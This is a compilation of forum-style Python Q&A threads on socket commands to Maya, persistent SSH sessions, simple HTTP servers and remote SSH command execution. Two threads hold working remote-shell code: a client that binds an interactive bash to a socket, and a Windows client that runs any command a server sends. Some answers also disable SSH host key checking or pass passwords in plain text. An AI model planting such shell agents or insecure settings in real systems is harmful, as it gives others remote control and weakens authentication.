Sending multiline commands to Maya through a Python socket

Is there a way to send a multiline command to Maya through a Python socket and Maya's own "commandPort" command?
I'm using the code below to send the command to Maya (the "message" value is the command):
import socket

#HOST = '192.168.1.122' # the remote host
HOST = '127.0.0.1'       # the local host
PORT = 54321             # the same port as used by the server
ADDR = (HOST, PORT)

def SendCommand():
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(ADDR)
    command = 'import maya.cmds as mc mc.polyCube()'  # the command from the external editor to Maya
    MyMessage = command
    client.send(MyMessage)
    data = client.recv(1024)  # receive the result info
    client.close()
    print 'The Result is %s' % data

if __name__ == '__main__':
    SendCommand()
When I send a single command like 'polyCube()' it works, but sending a Python command such as:
import maya.cmds as mc
mc.polyCube()
raises an "invalid syntax" error!

Try:
command = 'import maya.cmds as mc\nmc.polyCube()'

For sending small commands to Maya, @pajton's method works, or you can use ; as a separator:
command = "import maya.cmds as mc; mc.polyCube()"
If possible, the easiest way to send many lines at once is to create a separate .py file that Maya has access to.
command = "import sys; sys.append(r'c:\path to my_script');"
command += "import my_script; my_script.run()"

Related

How to keep ssh connection open and doing multiple requests and outputs within python

Because that question seems to aim somewhere else, I am going to state my problem here:
In my Python script I make multiple requests to a remote server over ssh:
import subprocess

def ssh(command):
    command = 'ssh SERVER "{}"'.format(command)
    output = subprocess.check_output(
        command,
        stderr=subprocess.STDOUT,
        shell=True,
        universal_newlines=True
    )
    return output
With this, ssh('cat file1') gives me the content of file1 as output.
I now have multiple methods which use this function:
def show_one():
    return ssh('cat file1')

def show_two():
    return ssh('cat file2')

def run():
    one = show_one()
    print(one)
    two = show_two()
    print(two)
Executing run() will open and close the ssh connection for each show_* method, which makes it pretty slow.
Solutions:
1. I can put
Host SERVER
    ControlMaster auto
    ControlPersist yes
    ControlPath ~/.ssh/socket-%r@%h:%p
into my .ssh/config, but I would like to solve this within Python.
2. There is the ssh flag -T to keep a connection open, and in the question mentioned above one answer was to use it with Popen() and p.communicate(), but it is not possible to get the output between the communicate calls because it throws ValueError: Cannot send input after starting communication.
3. I could change my functions to execute a single ssh command like echo "--show1--"; cat file1; echo "--show2--"; cat file2, but this looks hacky to me, and I hope there is a better method to just keep the ssh connection open and use it like normal.
What I would like to have: a pythonic/bashic way to do the same as I can configure in .ssh/config (see 1.), i.e. declare a specific socket for the connection and explicitly open, use, and close it.
Try creating an ssh object from a class and passing it to the functions:
import logging
import paramiko
from pythonping import ping
from scp import SCPClient

log = logging.getLogger(__name__)  # the original snippet uses `log` without defining it


class SSH():
    def __init__(self, ip='192.168.1.1', username='user', password='pass', connect=True, Timeout=10):
        self.ip = ip
        self.username = username
        self.password = password
        self.Timeout = Timeout
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        if connect:
            self.OpenConnection()
        self.scp = SCPClient(self.ssh.get_transport())

    def OpenConnection(self):
        try:
            skip_ping = False
            ping_res = False
            log.info('Sending ping to host (timeout=3,count=3) :' + self.ip)
            try:
                PingRes = ping(target=self.ip, timeout=3, count=3, verbose=True)
                log.info('Ping to host result :' + str(PingRes.success()))
                ping_res = PingRes.success()
            except:
                skip_ping = True
            if ping_res or skip_ping:
                log.info('Starting to open connection....')
                self.ssh.connect(hostname=self.ip, username=self.username, password=self.password,
                                 timeout=self.Timeout, auth_timeout=self.Timeout, banner_timeout=self.Timeout)
                self.scp = SCPClient(self.ssh.get_transport())
                log.info('Connection open')
                return True
            else:
                log.error('ssh OpenConnection failed: No Ping to host')
                return False
        except Exception as e:
            # the outer try needs a matching except to be valid Python
            log.error('ssh OpenConnection failed: ' + str(e))
            return False


myssh = SSH(ip='192.168.1.1', password='mypass', username='myusername')
The ping call is wrapped in try/except because my machine sometimes returns an error; you can remove it and just verify a ping to the host.
self.scp is for file transfer.
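As a rough usage sketch (not part of the original answer), the question's show_* functions could then reuse that single open connection via paramiko's exec_command:
myssh = SSH(ip='192.168.1.1', password='mypass', username='myusername')

def show_one():
    # exec_command reuses the already-open paramiko connection
    stdin, stdout, stderr = myssh.ssh.exec_command('cat file1')
    return stdout.read().decode()

def show_two():
    stdin, stdout, stderr = myssh.ssh.exec_command('cat file2')
    return stdout.read().decode()

print(show_one())
print(show_two())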

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results; I have that working already. I also don't want to abstract executing single commands by having the server interpret directory changes or what not.
I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, if I run cd /foo/bar, then pwd should return /foo/bar, because I would be interacting with the same bash shell.
Here's some slimmed-down example code that currently will only do single command execution...
# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))

while True:
    cmd = s.recv(1024)
    # single command execution currently (not an interactive shell)
    results = subprocess.Popen(cmd, shell=True,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE)
    results = results.stdout.read() + results.stderr.read()
    s.sendall(results)
# server.py
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()

while True:
    cmd = raw_input('> ').rstrip()
    conn.send(cmd)
    results = conn.recv(4096)
    print results
I've tried many solutions, none of which have worked. The subprocess module has a communicate method, but it kills the shell after a single command. I'd really like to accomplish this with the stdlib, but I've also looked at the pexpect module after reading this thread. However, I can't get that to work either; its primary use case doesn't seem to be creating an interactive shell, but rather catching specific command-line output for interaction. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help it would be appreciated. I feel like there could be a way to spawn off a /bin/bash -i with subprocess in another thread and then somehow write to its stdin and read from its stdout. Thanks in advance, and sorry for the length.
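For reference, a minimal sketch of that threaded idea (Python 3; localhost and port taken from the example above; an illustration only, not a hardened solution):
# client.py - one persistent interactive bash; a reader thread pumps its
# output back to the server while the main loop feeds it commands
import socket
import subprocess
import threading

s = socket.socket()
s.connect(('localhost', 1337))

shell = subprocess.Popen(['/bin/bash', '-i'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT)

def pump_output():
    # forward everything the shell prints to the server
    for chunk in iter(lambda: shell.stdout.read1(4096), b''):
        s.sendall(chunk)

threading.Thread(target=pump_output, daemon=True).start()

while True:
    cmd = s.recv(1024)
    if not cmd:
        break
    shell.stdin.write(cmd.rstrip(b'\n') + b'\n')
    shell.stdin.flush()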
Try this code:
# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))

process = subprocess.Popen(['/bin/bash', '-i'],
                           stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
                           stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
import subprocess
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()

fp = conn.makefile('wb')
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))
while True:
    fp.write(sys.stdin.read(4096))
proc1.wait()

Simple http server in Python 3.5.1 Shell

I am trying to get a simple http server going, using the directory in my code below as the root. This is using Python 3.5.1 Shell:
>>> import os
>>> import http.server
>>> import socketserver
>>> os.chdir('c:/users/owner/desktop/tom/tomsEnyo2.5-May27')
>>> python -m http.server 8000
SyntaxError: invalid syntax
>>> python -m SimpleHTTPServer 8000
SyntaxError: invalid syntax
>>>
I have looked at a similar topic: How to set up simple HTTP server in Python 3.5 on Windows 10?, but even when I try doing what the answer suggests, I still have the same problem ('invalid syntax').
You're confusing Python statements and shell commands.
import os etc. are Python statements (interpreted by Python); python -m http.server 8000 is a shell command, interpreted by bash, sh, or whatever Microsoft uses on Windows. You may try something like this to run it in the Python REPL:
import os
from http.server import SimpleHTTPRequestHandler, HTTPServer
os.chdir('c:/users/owner/desktop/tom/tomsEnyo2.5-May27')
server_address = ('', 8000)
httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
httpd.serve_forever()
But the easiest way is probably to just run python -m http.server 8000 from the right directory in your terminal emulator. Note that on recent versions of Python the http.server module also accepts a --directory or -d option to specify the directory to serve.
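For example, assuming Python 3.7 or newer (the directory is the one from the question):
python -m http.server 8000 --directory c:/users/owner/desktop/tom/tomsEnyo2.5-May27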
The problem is that python -m is not a Python statement itself; it should be used in the shell ;)
You can use this instead:
import http.server

def start_server(port=8000, bind="", cgi=False):
    if cgi:
        http.server.test(HandlerClass=http.server.CGIHTTPRequestHandler, port=port, bind=bind)
    else:
        http.server.test(HandlerClass=http.server.SimpleHTTPRequestHandler, port=port, bind=bind)

start_server()  # If you want CGI, set cgi to True, e.g. start_server(cgi=True)
Or, you can also do:
import http.server
import socketserver
PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()
The idea of running a web server inside the Python shell is questionable, as a server is a system-level process that is supposed to run forever. You could try launching it with the subprocess library instead.
Furthermore, you cannot run the python executable inside the Python shell. Once you are in the shell, you type Python code line by line, not OS executables.
If you want to start a server, you instead need to run the python executable with the http.server module from a directory in your OS command line; that directory will be served through the web server.
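A minimal sketch of that subprocess idea (the directory is the one from the question; a suggestion, not something from the original answer):
import subprocess
import sys

# launch the built-in server as a separate OS process from inside the Python shell
proc = subprocess.Popen(
    [sys.executable, '-m', 'http.server', '8000'],
    cwd='c:/users/owner/desktop/tom/tomsEnyo2.5-May27',  # directory to serve
)
# ... later, stop it with proc.terminate()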
import socket
import sys

try:
    HOST = 'Your_ip'
    PORT = 80
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, PORT))
    s.listen(10)
    print '[*]Running HTTP on port %s..' % PORT
    while 1:
        conn, addr = s.accept()
        print 'Connected with ' + addr[0] + ':' + str(addr[1])
        data = ""
        while 1:
            request = conn.recv(8000)
            data += request
            if len(data) == 24:
                print data
                req_list = data.split(' ')
                method = req_list[0]
                req_file = req_list[1]
                print 'The Requested file from client: ', req_file
                fileid = req_file.split('?')[0]
                fileid = fileid.lstrip('/')
                print fileid
                if fileid == 'index.html':  # verifies index.html
                    file = open(fileid, 'rb')
                    response = file.read()
                    file.close()
                    header = 'HTTP/1.1 200 OK\n'
                    mimetype = 'text/html'
                    header += 'Content-Type: ' + str(mimetype) + '\n\n'
                else:
                    header = 'HTTP/1.1 404 Not Found\n\n'
                    response = '<html><body><h3>Error 404: File not found</h3></body></html>'
                final_response = header.encode('utf-8')
                final_response += response
                conn.send(final_response)
            else:
                continue
        conn.close()
except KeyboardInterrupt as msg:
    sys.exit(0)
This HTTP server (an equivalent implementation on Linux) listens on port 80 and can be changed to listen on a different port. It parses the GET request and sends a successful response if the index.html file is requested, and an unsuccessful one if the client tries to access any other .html file. It is an alternative to a one-liner bash web server.

Remote Command Execution Python

For educational purposes, I set up a server that allows remote command execution on Windows - or rather, I tried to. For some reason, the command line refuses to recognize some of the commands I send, but others work fine. For instance, sending the command echo "Hello World!!!" causes, as it should, a cmd window to pop up reading "Hello World!!!". Fine. But when I send the command shutdown /s /t 30 it gives me the improper syntax / help screen for the shutdown command. When I send the command msg * "Hello World" it tells me that 'msg' is not a recognized internal or external command, operable program, or batch file. Here is my server code:
import socket
import sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_address = ('', 4242)
sock.bind(server_address)
sock.listen(1)
connection, client_address = sock.accept()
print("Connection established with %s " % str(client_address))

while True:
    command = input("Enter a command: ")
    connection.send(bytes(command, 'UTF-8'))
    confirm = connection.recv(128)
    if confirm == "yes":
        print("[+] Command executed successfully.")
    else:
        print("[-] Command failed to execute!!!")
And here is my client code:
import socket
import sys
import os

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_address = ('', 42042)
sock.bind(server_address)
sock.connect(('192.168.1.5', 4242))

while True:
    command = str(sock.recv(1024))
    try:
        os.system(command[2:])  # an odd thing, the commands somehow came out prefaced with "b'". Ideas?
        sock.send(bytes("yes", 'UTF-8'))
    except:
        sock.send(bytes("no", 'UTF-8'))
So yeah, that's that. The fact that only SOME commands are getting screwed up is really confusing me. Anybody have any ideas? Also, what's up with that "b'"?
str(sock.recv(1024)) is not the way to convert a bytes object into a string; you should use sock.recv(1024).decode('UTF-8') instead. str() gives you the repr of the bytes object (b'...'), and slicing off the first two characters still leaves the trailing quote, which is why, for example, shutdown /s /t 30 arrives as shutdown /s /t 30' and hits the help screen.
You can look at the documentation for bytes.decode: https://docs.python.org/3.4/library/stdtypes.html#bytes.decode
Or this related question: Best way to convert string to bytes in Python 3?
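As a rough sketch (not from the original answer), the client loop with that fix applied might look like this:
import os
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.1.5', 4242))

while True:
    command = sock.recv(1024).decode('UTF-8')  # bytes -> str, no b'...' wrapper
    exit_code = os.system(command)             # 0 means the shell reported success
    reply = 'yes' if exit_code == 0 else 'no'
    sock.send(reply.encode('UTF-8'))
    # the server side would similarly need connection.recv(128).decode('UTF-8')
    # before comparing against "yes"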

Perform commands over ssh with Python

I'm writing a script to automate some command line commands in Python. At the moment, I'm doing calls like this:
cmd = "some unix command"
retcode = subprocess.call(cmd,shell=True)
However, I need to run some commands on a remote machine. Manually, I would log in using ssh and then run the commands. How would I automate this in Python? I need to log in with a (known) password to the remote machine, so I can't just use cmd = ssh user@remotehost. I'm wondering if there's a module I should be using?
I will refer you to paramiko
see this question
ssh = paramiko.SSHClient()
ssh.connect(server, username=username, password=password)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd_to_execute)
If you are using ssh keys, do:
k = paramiko.RSAKey.from_private_key_file(keyfilename)
# OR k = paramiko.DSSKey.from_private_key_file(keyfilename)
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host, username=user, pkey=k)
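If it helps, a small continuation (not part of the original answer) for reading the command's output and exit status from those objects:
output = ssh_stdout.read().decode()
errors = ssh_stderr.read().decode()
status = ssh_stdout.channel.recv_exit_status()  # blocks until the command finishes
print(output, errors, status)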
Keep it simple. No libraries required.
import subprocess
# Python 2
subprocess.Popen("ssh {user}#{host} {cmd}".format(user=user, host=host, cmd='ls -l'), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
# Python 3
subprocess.Popen(f"ssh {user}#{host} {cmd}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
Or you can just use commands.getstatusoutput:
commands.getstatusoutput("ssh machine 1 'your script'")
I used it extensively and it works great. (Note that the commands module is Python 2 only; on Python 3 the equivalent is subprocess.getstatusoutput.)
In Python 2.6+, use subprocess.check_output.
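For example (host and command are placeholders):
import subprocess
output = subprocess.check_output(['ssh', 'user@remotehost', 'ls -l'])
print(output)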
I found paramiko to be a bit too low-level, and Fabric not especially well-suited to being used as a library, so I put together my own library called spur that uses paramiko to implement a slightly nicer interface:
import spur
shell = spur.SshShell(hostname="localhost", username="bob", password="password1")
result = shell.run(["echo", "-n", "hello"])
print result.output # prints hello
If you need to run inside a shell:
shell.run(["sh", "-c", "echo -n hello"])
Everyone has already stated (and recommended) using paramiko, so I am just sharing Python code (an API, one may say) that will allow you to execute multiple commands in one go.
To execute commands on a different node, use: Commands().run_cmd(host_ip, list_of_commands).
You will see one TODO, which I have kept in order to stop the execution if any of the commands fails to execute; I don't know how to do it, please share your knowledge.
#!/usr/bin/python

import os
import sys
import select
import paramiko
import time


class Commands:
    def __init__(self, retry_time=0):
        self.retry_time = retry_time

    def run_cmd(self, host_ip, cmd_list):
        i = 0
        while True:
            # print("Trying to connect to %s (%i/%i)" % (self.host, i, self.retry_time))
            try:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(host_ip)
                break
            except paramiko.AuthenticationException:
                print("Authentication failed when connecting to %s" % host_ip)
                sys.exit(1)
            except:
                print("Could not SSH to %s, waiting for it to start" % host_ip)
                i += 1
                time.sleep(2)

            # If we could not connect within time limit
            if i >= self.retry_time:
                print("Could not connect to %s. Giving up" % host_ip)
                sys.exit(1)

        # After connection is successful
        # Send the command
        for command in cmd_list:
            # print command
            print "> " + command
            # execute commands
            stdin, stdout, stderr = ssh.exec_command(command)
            # TODO() : if an error is thrown, stop further rules and revert back changes
            # Wait for the command to terminate
            while not stdout.channel.exit_status_ready():
                # Only print data if there is data to read in the channel
                if stdout.channel.recv_ready():
                    rl, wl, xl = select.select([stdout.channel], [], [], 0.0)
                    if len(rl) > 0:
                        tmp = stdout.channel.recv(1024)
                        output = tmp.decode()
                        print output

        # Close SSH connection
        ssh.close()
        return


def main(args=None):
    if args is None:
        print "arguments expected"
    else:
        # args = {'<ip_address>', <list_of_commands>}
        mytest = Commands()
        mytest.run_cmd(host_ip=args[0], cmd_list=args[1])
    return


if __name__ == "__main__":
    main(sys.argv[1:])
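A quick usage sketch (the IP and commands are placeholders; note that run_cmd calls ssh.connect(host_ip) without credentials, so it relies on key/agent authentication):
# hypothetical host and commands, just to show the calling convention
Commands(retry_time=3).run_cmd(host_ip='192.168.1.10',
                               cmd_list=['uname -a', 'uptime'])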
paramiko finally worked for me after adding an additional line, which is a really important one (line 3):
import paramiko
p = paramiko.SSHClient()
p.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # This script doesn't work for me unless this line is added!
p.connect("server", port=22, username="username", password="password")
stdin, stdout, stderr = p.exec_command("your command")
opt = stdout.readlines()
opt = "".join(opt)
print(opt)
Make sure that paramiko package is installed.
Original source of the solution: Source
The accepted answer didn't work for me, here's what I used instead:
import paramiko
import os
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# ssh.load_system_host_keys()
ssh.load_host_keys(os.path.expanduser('~/.ssh/known_hosts'))
ssh.connect("d.d.d.d", username="user", password="pass", port=22222)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("ls -alrt")
exit_code = ssh_stdout.channel.recv_exit_status() # handles async exit error
for line in ssh_stdout:
    print(line.strip())
total 44
-rw-r--r--. 1 root root 129 Dec 28 2013 .tcshrc
-rw-r--r--. 1 root root 100 Dec 28 2013 .cshrc
-rw-r--r--. 1 root root 176 Dec 28 2013 .bashrc
...
Alternatively, you can use sshpass:
import subprocess
cmd = """ sshpass -p "myPas$" ssh user#d.d.d.d -p 22222 'my command; exit' """
print( subprocess.getoutput(cmd) )
References:
https://github.com/onyxfish/relay/issues/11
https://stackoverflow.com/a/61016663/797495
Notes:
Just make sure to connect manually at least one time to the remote system via ssh (ssh root@ip) and accept the public key; this is often the reason for not being able to connect using paramiko or other automated ssh scripts.
I have used paramiko a bunch (nice) and pxssh (also nice). I would recommend either. They work a little differently but have a relatively large overlap in usage.
First: I'm surprised that no one has mentioned fabric yet.
Second: For exactly the requirements you describe I've implemented my own Python module named jk_simpleexec. Its purpose: making running commands easy.
Let me explain a little bit about it for you.
The 'executing a command locally' problem
My python module jk_simpleexec provides a function named runCmd(..) that can execute a shell (!) command locally or remotely. This is very simple. Here is an example for local execution of a command:
import jk_simpleexec
cmdResult = jk_simpleexec.runCmd(None, "cd / ; ls -la")
NOTE: Be aware that the returned data is automatically trimmed by default to remove excessive empty lines from STDOUT and STDERR. (Of course this behavior can be deactivated, but for the purpose you have in mind, exactly that behavior is what you will want.)
The 'processing the result' problem
What you will receive is an object that contains the return code, STDOUT and STDERR. Therefore it's very easy to process the result.
And this is what you want to do, as the command you execute might exist and launch but still fail to do what it is intended to do. In the simplest case, where you're not interested in STDOUT and STDERR, your code will likely look something like this:
cmdResult.raiseExceptionOnError("Something went wrong!", bDumpStatusOnError=True)
For debugging purposes you want to output the result to STDOUT at some time, so for this you can do just this:
cmdResult.dump()
If you want to process STDOUT, that's simple as well. Example:
for line in cmdResult.stdOutLines:
    print(line)
The 'executing a command remotely' problem
Now of course we might want to execute this command remotely on another system. For this we can use the same function runCmd(..) in exactly the same way but we need to specify a fabric connection object first. This can be done like this:
from fabric import Connection
REMOTE_HOST = "myhost"
REMOTE_PORT = 22
REMOTE_LOGIN = "mylogin"
REMOTE_PASSWORD = "mypwd"
c = Connection(host=REMOTE_HOST, user=REMOTE_LOGIN, port=REMOTE_PORT, connect_kwargs={"password": REMOTE_PASSWORD})
cmdResult = jk_simpleexec.runCmd(c, "cd / ; ls -la")
# ... process the result stored in cmdResult ...
c.close()
Everything remains exactly the same, but this time we run this command on another host. This is intended: I wanted to have a uniform API where there are no modifications required in the software if you at some time decide to move from the local host to another host.
The password input problem
Now of course there is the password problem. This has been mentioned above by some users: we might want to ask the user executing this Python code for a password.
For this problem I created my own module quite some time ago: jk_pwdinput. The difference from regular password input is that jk_pwdinput outputs stars instead of printing nothing, so for every password character you type you will see a star. This makes it easier to enter a password.
Here is the code:
import jk_pwdinput
# ... define other 'constants' such as REMOTE_LOGIN, REMOTE_HOST ...
REMOTE_PASSWORD = jk_pwdinput.readpwd("Password for " + REMOTE_LOGIN + "@" + REMOTE_HOST + ": ")
(For completeness: If readpwd(..) returned None the user canceled the password input with Ctrl+C. In a real world scenario you might want to act on this appropriately.)
Full example
Here is a full example:
import jk_simpleexec
import jk_pwdinput
from fabric import Connection
REMOTE_HOST = "myhost"
REMOTE_PORT = 22
REMOTE_LOGIN = "mylogin"
REMOTE_PASSWORD = jk_pwdinput.readpwd("Password for " + REMOTE_LOGIN + "@" + REMOTE_HOST + ": ")
c = Connection(host=REMOTE_HOST, user=REMOTE_LOGIN, port=REMOTE_PORT, connect_kwargs={"password": REMOTE_PASSWORD})
cmdResult = jk_simpleexec.runCmd(
    c = c,
    command = "cd / ; ls -la"
)
cmdResult.raiseExceptionOnError("Something went wrong!", bDumpStatusOnError=True)
c.close()
Final notes
So we have the full set:
Executing a command,
executing that command remotely via the same API,
creating the connection in an easy and secure way with password input.
The code above solves the problem quite well for me (and hopefully for you as well). And everything is open source: Fabric is BSD-2-Clause, and my own modules are provided under Apache-2.
Modules used:
fabric : http://www.fabfile.org/
jk_pwdinput : https://github.com/jkpubsrc/python-module-jk-pwdinput
jk_simpleexec : https://github.com/jkpubsrc/python-module-jk-simpleexec
Happy coding! ;-)
Works Perfectly...
import paramiko
import time

ssh = paramiko.SSHClient()
#ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('10.106.104.24', port=22, username='admin', password='')
time.sleep(5)
print('connected')
stdin, stdout, stderr = ssh.exec_command(" ")

def execute():
    stdin.write('xcommand SystemUnit Boot Action: Restart\n')
    print('success')

execute()
You can use either of these commands; they also let you supply a password.
cmd = subprocess.run(["sshpass -p 'password' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@domain.com ps | grep minicom"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
print(cmd.stdout)
OR
cmd = subprocess.getoutput("sshpass -p 'password' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@domain.com ps | grep minicom")
print(cmd)
Have a look at spurplus, a wrapper we developed around spur that provides type annotations and some minor gimmicks (reconnecting SFTP, md5 etc.): https://pypi.org/project/spurplus/
This asks the user to enter the command, depending on the device they are logging in to.
The code below was validated by PEP8online.com.
import paramiko
import xlrd
import time

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
loc = ('/Users/harshgow/Documents/PYTHON_WORK/labcred.xlsx')
wo = xlrd.open_workbook(loc)
sheet = wo.sheet_by_index(0)
Host = sheet.cell_value(0, 1)
Port = int(sheet.cell_value(3, 1))
User = sheet.cell_value(1, 1)
Pass = sheet.cell_value(2, 1)


def details(Host, Port, User, Pass):
    time.sleep(2)
    ssh.connect(Host, Port, User, Pass)
    print('connected to ip ', Host)
    stdin, stdout, stderr = ssh.exec_command("")
    x = input('Enter the command:')
    stdin.write(x)
    stdin.write('\n')
    print('success')


details(Host, Port, User, Pass)
# Reading the Host, username, password, port from an Excel file
import paramiko
import xlrd

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
loc = ('/Users/harshgow/Documents/PYTHON_WORK/labcred.xlsx')
wo = xlrd.open_workbook(loc)
sheet = wo.sheet_by_index(0)
Host = sheet.cell_value(0, 1)
Port = int(sheet.cell_value(3, 1))
User = sheet.cell_value(1, 1)
Pass = sheet.cell_value(2, 1)


def details(Host, Port, User, Pass):
    ssh.connect(Host, Port, User, Pass)
    print('connected to ip ', Host)
    stdin, stdout, stderr = ssh.exec_command("")
    stdin.write('xcommand SystemUnit Boot Action: Restart\n')
    print('success')


details(Host, Port, User, Pass)
The most modern approach is probably to use fabric. This module allows you to set up an SSH connection and then run commands and get their results over the connection object.
Here's a simple example:
from fabric import Connection

with Connection("your_hostname") as connection:
    result = connection.run("uname -s", hide=True)
    msg = "Ran {0.command!r} on {0.connection.host}, got stdout:\n{0.stdout}"
    print(msg.format(result))
I wrote a simple class to run commands on a remote host over native ssh, using the subprocess module:
Usage
from ssh_utils import SshClient
client = SshClient(user='username', remote='remote_host', key_path='path/to/key.pem')
# run a list of commands
client.cmd(['mkdir ~/testdir', 'ls -la', 'echo done!'])
# copy files/dirs
client.scp('my_file.txt', '~/testdir')
Class source code
https://gist.github.com/mamaj/a7b378a5c969e3e32a9e4f9bceb0c5eb
import subprocess
from pathlib import Path
from typing import Union


class SshClient():
    """ Perform commands and copy files on ssh using subprocess
        and native ssh client (OpenSSH).
    """

    def __init__(self,
                 user: str,
                 remote: str,
                 key_path: Union[str, Path]) -> None:
        """
        Args:
            user (str): username for the remote
            remote (str): remote host IP/DNS
            key_path (str or pathlib.Path): path to .pem file
        """
        self.user = user
        self.remote = remote
        self.key_path = str(key_path)

    def cmd(self,
            cmds: list[str],
            strict_host_key_checking=False) -> None:
        """Runs commands consecutively, ensuring success of each
        before calling the next command.

        Args:
            cmds (list[str]): list of commands to run.
            strict_host_key_checking (bool, optional): Defaults to False.
        """
        strict_host_key_checking = 'yes' if strict_host_key_checking \
            else 'no'
        cmd = ' && '.join(cmds)
        subprocess.run(
            [
                'ssh',
                '-i', self.key_path,
                '-o', f'StrictHostKeyChecking={strict_host_key_checking}',
                '-o', 'UserKnownHostsFile=/dev/null',
                f'{self.user}@{self.remote}',
                cmd
            ]
        )

    def scp(self, source: Union[str, Path], destination: Union[str, Path]):
        """Copies `source` file to remote `destination` using the
        native `scp` command.

        Args:
            source (Union[str, Path]): Source file path.
            destination (Union[str, Path]): Destination path on remote.
        """
        subprocess.run(
            [
                'scp',
                '-i', self.key_path,
                str(source),
                f'{self.user}@{self.remote}:{str(destination)}',
            ]
        )
Below is an example, in case you want user input for the hostname, username, password, and port number.
import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())


def details():
    Host = input("Enter the Hostname: ")
    Port = input("Enter the Port: ")
    User = input("Enter the Username: ")
    Pass = input("Enter the Password: ")
    ssh.connect(Host, Port, User, Pass, timeout=2)
    print('connected')
    stdin, stdout, stderr = ssh.exec_command("")
    stdin.write('xcommand SystemUnit Boot Action: Restart\n')
    print('success')


details()
